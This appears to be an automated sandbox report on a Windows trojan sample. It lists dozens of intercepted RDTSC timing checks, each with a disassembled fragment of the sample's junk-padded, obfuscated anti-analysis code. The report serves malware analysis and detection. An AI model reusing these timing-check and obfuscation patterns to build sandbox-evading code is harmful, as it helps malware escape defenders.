Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0B2D second address: 4DA0B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov bl, 3Bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FABC90CD765h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0B51 second address: 4DA0B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0B57 second address: 4DA0B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0B5B second address: 4DA0B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0CCB second address: 4DB0D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 7616CE1Fh 0x00000008 mov ax, 2D3Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FABC90CD75Ch 0x00000017 sub eax, 13E49B88h 0x0000001d jmp 00007FABC90CD75Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FABC90CD768h 0x00000029 and si, 7DE8h 0x0000002e jmp 00007FABC90CD75Bh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FABC90CD75Fh 0x0000003d and ah, 0000002Eh 0x00000040 jmp 00007FABC90CD769h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007FABC90CD760h 0x0000004c sbb eax, 61CE52A8h 0x00000052 jmp 00007FABC90CD75Bh 0x00000057 popfd 0x00000058 popad 0x00000059 xchg eax, ebp 0x0000005a pushad 0x0000005b mov al, ACh 0x0000005d mov bh, 57h 0x0000005f popad 0x00000060 mov ebp, esp 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0D88 second address: 4DB0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0D8C second address: 4DB0D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0D92 second address: 4DB0DA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0DA9 second address: 4DB0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0DAD second address: 4DB0DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0A83 second address: 4DB0A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0A89 second address: 4DB0A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0A8D second address: 4DB0AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FABC90CD761h 0x00000012 xor al, FFFFFFF6h 0x00000015 jmp 00007FABC90CD761h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FABC90CD760h 0x00000021 or cl, 00000018h 0x00000024 jmp 00007FABC90CD75Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0AE1 second address: 4DB0AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0AE7 second address: 4DB0AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0AF8 second address: 4DB0AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0AFC second address: 4DB0B14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0B14 second address: 4DB0B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cl, AEh 0x0000000e mov al, bh 0x00000010 popad 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov dx, 9F08h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DB0B35 second address: 4DB0B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E30782 second address: 4E3079F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E3079F second address: 4E307FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f movzx ecx, di 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FABC90CD75Eh 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushad 0x0000001c call 00007FABC90CD75Ch 0x00000021 pop esi 0x00000022 movsx edx, si 0x00000025 popad 0x00000026 movzx ecx, bx 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FABC90CD762h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E307FB second address: 4E30822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABC9471C35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E2090E second address: 4E20914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20914 second address: 4E20942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FABC9471C30h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20942 second address: 4E20946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20946 second address: 4E2094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E2094C second address: 4E209EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c movsx ebx, ax 0x0000000f mov ebx, eax 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FABC90CD766h 0x0000001a xor eax, 3D6D94F8h 0x00000020 jmp 00007FABC90CD75Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FABC90CD768h 0x0000002c jmp 00007FABC90CD765h 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 jmp 00007FABC90CD75Eh 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov cx, dx 0x00000041 call 00007FABC90CD769h 0x00000046 pop eax 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC00A8 second address: 4DC00AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC00AC second address: 4DC00B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC00B0 second address: 4DC00B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC00B6 second address: 4DC00CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD761h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC00CB second address: 4DC00CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20B47 second address: 4E20B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FABC90CD75Ah 0x0000000f push eax 0x00000010 jmp 00007FABC90CD75Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20B6D second address: 4E20B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC9471C31h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20B83 second address: 4E20BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d call 00007FABC90CD75Ah 0x00000012 pop eax 0x00000013 mov di, 9F86h 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007FABC90CD767h 0x0000001e and ah, 0000000Eh 0x00000021 jmp 00007FABC90CD769h 0x00000026 popfd 0x00000027 popad 0x00000028 push dword ptr [ebp+0Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FABC90CD75Dh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20BF4 second address: 4E20C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 483B3CD2h 0x00000008 mov bx, 541Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push dword ptr [ebp+08h] 0x00000012 jmp 00007FABC9471C35h 0x00000017 push 440B3103h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FABC9471C39h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20C3D second address: 4E20C52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20C52 second address: 4E20C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20C62 second address: 4E20CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 440A3101h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 pushfd 0x00000016 jmp 00007FABC90CD765h 0x0000001b sub ax, C7C6h 0x00000020 jmp 00007FABC90CD761h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20CA5 second address: 4E20CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20CAB second address: 4E20CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20CAF second address: 4E20CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20CD5 second address: 4E20CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4E20CE7 second address: 4E20D21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b jmp 00007FABC9471C37h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FABC9471C35h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2C02C second address: B2C030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2C030 second address: B2C036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD027F second address: 4DD02DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD75Fh 0x00000009 sub esi, 69D5739Eh 0x0000000f jmp 00007FABC90CD769h 0x00000014 popfd 0x00000015 mov ah, 43h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FABC90CD75Ah 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FABC90CD767h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD02DC second address: 4DD0315 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FABC9471C33h 0x00000013 pop ecx 0x00000014 push edx 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0315 second address: 4DD031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD031B second address: 4DD031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD031F second address: 4DD0352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FABC90CD765h 0x00000012 jmp 00007FABC90CD760h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0352 second address: 4DD03B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC9471C31h 0x00000009 sbb eax, 4211DA06h 0x0000000f jmp 00007FABC9471C31h 0x00000014 popfd 0x00000015 call 00007FABC9471C30h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e call 00007FABC9471C29h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movzx ecx, di 0x00000029 call 00007FABC9471C2Fh 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD03B3 second address: 4DD03BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD03BA second address: 4DD0483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a mov ch, 84h 0x0000000c pop ebx 0x0000000d call 00007FABC9471C34h 0x00000012 jmp 00007FABC9471C32h 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e call 00007FABC9471C2Eh 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 jmp 00007FABC9471C31h 0x0000002b popad 0x0000002c mov eax, dword ptr [eax] 0x0000002e jmp 00007FABC9471C31h 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 jmp 00007FABC9471C31h 0x0000003c pop eax 0x0000003d jmp 00007FABC9471C2Eh 0x00000042 push 015CA5D5h 0x00000047 pushad 0x00000048 call 00007FABC9471C37h 0x0000004d push esi 0x0000004e pop ebx 0x0000004f pop eax 0x00000050 mov bx, 26E8h 0x00000054 popad 0x00000055 add dword ptr [esp], 75EA082Bh 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push esi 0x00000060 pop edi 0x00000061 mov dx, ax 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0483 second address: 4DD0503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD767h 0x00000009 sub cx, 8EDEh 0x0000000e jmp 00007FABC90CD769h 0x00000013 popfd 0x00000014 mov edi, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr fs:[00000000h] 0x0000001f jmp 00007FABC90CD75Ah 0x00000024 nop 0x00000025 jmp 00007FABC90CD760h 0x0000002a push eax 0x0000002b pushad 0x0000002c push edx 0x0000002d jmp 00007FABC90CD75Ch 0x00000032 pop ecx 0x00000033 movsx edx, si 0x00000036 popad 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ebx, 60A5895Ah 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0503 second address: 4DD0509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0651 second address: 4DD06BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC90CD75Ah 0x00000009 adc ecx, 0B2920F8h 0x0000000f jmp 00007FABC90CD75Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FABC90CD768h 0x0000001b sub ecx, 4F087B58h 0x00000021 jmp 00007FABC90CD75Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xchg eax, edi 0x0000002b pushad 0x0000002c mov edx, eax 0x0000002e mov si, 5A07h 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FABC90CD75Fh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD06BC second address: 4DD06C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD06C2 second address: 4DD06D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD06D1 second address: 4DD06F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, 64h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD06F8 second address: 4DD06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD06FD second address: 4DD0703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0703 second address: 4DD0707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0707 second address: 4DD0788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [7751B370h] 0x00000010 jmp 00007FABC9471C2Eh 0x00000015 xor dword ptr [ebp-08h], eax 0x00000018 pushad 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FABC9471C2Ch 0x00000020 or ah, 00000008h 0x00000023 jmp 00007FABC9471C2Bh 0x00000028 popfd 0x00000029 push esi 0x0000002a pop ebx 0x0000002b popad 0x0000002c pushad 0x0000002d jmp 00007FABC9471C32h 0x00000032 mov ecx, 38DC0A81h 0x00000037 popad 0x00000038 popad 0x00000039 xor eax, ebp 0x0000003b pushad 0x0000003c mov edx, 481EC4FEh 0x00000041 mov di, 330Ah 0x00000045 popad 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FABC9471C2Dh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0788 second address: 4DD078E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
